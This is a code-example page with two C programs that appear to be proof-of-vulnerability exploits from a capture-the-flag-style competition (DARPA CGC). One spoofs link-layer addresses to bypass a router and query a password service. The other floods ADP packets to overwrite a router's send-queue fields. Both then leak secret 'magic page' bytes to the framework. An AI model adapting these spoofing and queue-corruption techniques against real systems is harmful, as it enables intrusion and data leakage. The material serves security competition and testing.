Exemplo n.º 1
0
int main(void) {
	unsigned int type2_addr;
	unsigned int type2_size;
	unsigned int type2_length;
	unsigned char Frame[MAX_FRAME_SIZE];
	uint8_t Len;
	uint8_t EchoLen;
	pL2Hdr pL2 = (pL2Hdr)Frame;
	uint8_t i;

	// negotiate a Type2 POV with the Competition Framework
	NegotiateType2Pov(&type2_addr, &type2_size, &type2_length);

	// send a normally routed packet to build the L2 CAM tables in cb_switch
	bzero(Frame, MAX_FRAME_SIZE);
	BuildL4Segment(ECHO_L4ADDR, 0x41, (unsigned char *)"AA", 2, Frame);
	BuildL3Packet(0x0a010202, 0x0a010102, Frame);
	EchoLen = BuildL2Frame(0x0001, 0x1000, 0, Frame);
	SendBytes(STDOUT, Frame, EchoLen);

	// receive the ADP request that the router will generate when trying
	// to send back the echo response packet
	bzero(Frame, MAX_FRAME_SIZE);
	ReadBytes(STDIN, Frame, 19);
	
	// answer the ADP request 
	bzero(Frame, MAX_FRAME_SIZE);
	Len = BuildAdpResponse(0x0a010102, 0x1000, 0x0001, 0x1000, 0, Frame);
	SendBytes(STDOUT, Frame, Len);

	// read the echo response
	bzero(Frame, MAX_FRAME_SIZE);
	ReadBytes(STDIN, Frame, EchoLen);

	for (i = 0; i < 4; i++) {
		// send a pwdgen request to cb_3 bypassing the router
		// use src L2 addr with 00 for last two bits
		bzero(Frame, MAX_FRAME_SIZE);
		BuildL4Segment(PWDGEN_L4ADDR, 0x41, (unsigned char *)"AA", 2, Frame);
		BuildL3Packet(0x0a010202, 0x0a010102, Frame);
		Len = BuildL2Frame(0xaaaa, 0x1000+i, 2, Frame);
		SendBytes(STDOUT, Frame, Len);
	
		// receive the pwdgen response
		// read in the L2hdr first
		ReadBytes(STDIN, Frame, L2_HDR_LEN);
		// read in the rest of the Frame
		ReadBytes(STDIN, Frame+L2_HDR_LEN, pL2->Len);
	
		// Parse the pwdgen response
		ParsePwdgenResponse(Frame, 4+i);
	}

	// send the recovered page bytes to the competition framework
	SendBytes(FRAMEWORK, decoded_magic_page+4, 4);

}
Exemplo n.º 2
0
int main(void) {
	unsigned int type2_addr;
	unsigned int type2_size;
	unsigned int type2_length;
	unsigned char Frame[MAX_FRAME_SIZE];
	uint8_t Len;
	uint8_t EchoLen;
	pL2Hdr pL2 = (pL2Hdr)Frame;
	uint8_t i;
	fd_set readfds;
	int readyfds;
	struct timeval timeout;
	unsigned char *magic_bytes;

	// negotiate a Type2 POV with the Competition Framework
	NegotiateType2Pov(&type2_addr, &type2_size, &type2_length);

	// force the pov to sleep letting the router and cb_3 processes
	// exchange their echo packets so that SendQueue[0] has the desired
	// Frame data
	FD_ZERO(&readfds);
	FD_SET(STDIN, &readfds);
	timeout.tv_sec = 2;
	timeout.tv_usec = 0;
	fdwait(STDIN+1, &readfds, NULL, &timeout, NULL);

	// send 13 gratuitous ADP packets for different L3Addr's
	uint32_t L3Addr = 0x0a010110;
	for (i = 0; i < 13; i++, L3Addr++) {
		bzero(Frame, MAX_FRAME_SIZE);
		Len = BuildAdpResponse(L3Addr, 0x1001, 0x0001, 0x1000, 0, Frame);
		SendBytes(STDOUT, Frame, Len);
	}

	// send one more ADP which will overwrite SendQueue[0]
	//
	// the L3addr of the ADP header should point to a L3Addr that
	// has been previously populated in the router's ADP cache
	//
	// the L2Addr of the ADP header should overwrite the 1-byte Valid
	// with a non-zero value and the 1-byte Age field with 0xfe.
	bzero(Frame, MAX_FRAME_SIZE);
	Len = BuildAdpResponse(0x0a010102, 0x0001, 0x0001, 0x1000, 0, Frame);
	//                                   ^ ^
	//                                Age| |Valid
	SendBytes(STDOUT, Frame, Len);

	// Send enough packets to the original L3Addr we populated in the router's
	// ADP to cause it to age out.
	// The router will forward it back to VLAN 1, but to an unknown unicast L2Addr
	// so the switch will drop it
	for (i = 0; i < 8; i++) {
		bzero(Frame, MAX_FRAME_SIZE);
	        BuildL4Segment(ECHO_L4ADDR, 0x41, (unsigned char *)"AA", 2, Frame);
	        BuildL3Packet(L3Addr-1, 0x0a010102, Frame);
	        EchoLen = BuildL2Frame(0x0001, 0x1000, 0, Frame);
	        SendBytes(STDOUT, Frame, EchoLen);
	}

	// Finally, create ADP entry for the addr we over-wrote
	// allowing the queued packet to be sent
	bzero(Frame, MAX_FRAME_SIZE);
	Len = BuildAdpResponse(0x0a010102, 0x1000, 0x0001, 0x1000, 0, Frame);
	SendBytes(STDOUT, Frame, Len);

	// cgc_read in the ADP frame that'll be sent before the target frame
	bzero(Frame, MAX_FRAME_SIZE);
	ReadBytes(STDIN, Frame, sizeof(L2Hdr)+sizeof(L2Adjacency)+4);
	
	// see if we have a packet to cgc_read 
	FD_ZERO(&readfds);
	FD_SET(STDIN, &readfds);
	timeout.tv_sec = 2;
	timeout.tv_usec = 0;
	if (fdwait(STDIN+1, &readfds, NULL, &timeout, &readyfds) != 0) {
		SendBytes(STDOUT, (unsigned char *)"diedie!", 7);
		bzero(Frame, MAX_FRAME_SIZE);
		SendBytes(FRAMEWORK, Frame, 4);
		_terminate(0);	
	}
	if (readyfds == 0) {
		SendBytes(STDOUT, (unsigned char *)"diedie!", 7);
		bzero(Frame, MAX_FRAME_SIZE);
		SendBytes(FRAMEWORK, Frame, 4);
		_terminate(0);	
	}

	// cgc_read the forwarded frame
	bzero(Frame, MAX_FRAME_SIZE);
	ReadBytes(STDIN, Frame, sizeof(L2Hdr)+sizeof(L3Hdr)+sizeof(L4Hdr)+4+4);
	
	// send the recovered page bytes to the competition framework
	magic_bytes = Frame+sizeof(L2Hdr)+sizeof(L3Hdr)+sizeof(L4Hdr);
	SendBytes(FRAMEWORK, magic_bytes, 4);

}